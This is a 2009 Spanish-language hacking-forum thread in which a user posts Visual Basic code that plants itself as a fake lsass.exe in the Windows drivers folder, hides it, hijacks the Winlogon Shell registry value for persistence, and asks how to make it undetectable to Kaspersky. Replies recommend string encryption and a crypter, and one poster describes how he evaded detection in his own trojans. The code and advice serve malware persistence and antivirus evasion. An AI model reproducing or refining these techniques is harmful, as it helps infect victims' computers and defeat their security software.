Foro de elhacker.net

Programación => Programación Visual Basic => Mensaje iniciado por: demoniox12 en 4 Marzo 2009, 15:51 pm



Título: Indetectabilizar unas lineas en vb
Publicado por: demoniox12 en 4 Marzo 2009, 15:51 pm
Buenas,

el pedazo de codigo que detecta es:

Código
  1. Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
  2. FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
  3. SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
  4. DoEvents
  5. Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos

Les digo las combinaciones que detecta:

cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?

Saludos!

PD: el Antivirus es el Kaspersky


Título: Re: Indetectabilizar unas lineas en vb
Publicado por: Karcrack en 4 Marzo 2009, 22:14 pm
Que tal si encriptas las cadenas?
Citar
[KPC], cifra tus proyectos en VB (http://internal-minds.com.ar/2008/07/source-karcrack-project-crypter.html)

Saludos ;)


Título: Re: Indetectabilizar unas lineas en vb
Publicado por: Tengu en 5 Marzo 2009, 17:08 pm
asi es, deberias buscar en google, una funcion para cifrar strings
Igualmente en este foro recuerdo haer posteado algo asi. dejame ver...


Título: Re: Indetectabilizar unas lineas en vb
Publicado por: vivachapas en 5 Marzo 2009, 19:08 pm
te digo lo q yo hacia en mis troyanos...

para q se copien a otra carpeta.. no usaba filecopy xq tb me lo detectaba... lo habria en una cadena a si mismo.. creaba el archivo en otra carpeta... y cerraba el archivo... luego lo ejecutaba al nuevo archivo.. este esperaba 10 seg a q el otro termine y se cierre.. lo buscaba y lo borraba...

luego para el regedit simplemente encriptaba el texto plano y ya no te lo detecta

SALUDOS


Título: Re: Indetectabilizar unas lineas en vb
Publicado por: demoniox12 en 6 Marzo 2009, 16:43 pm
Muchas gracias muchachos!

Saludos!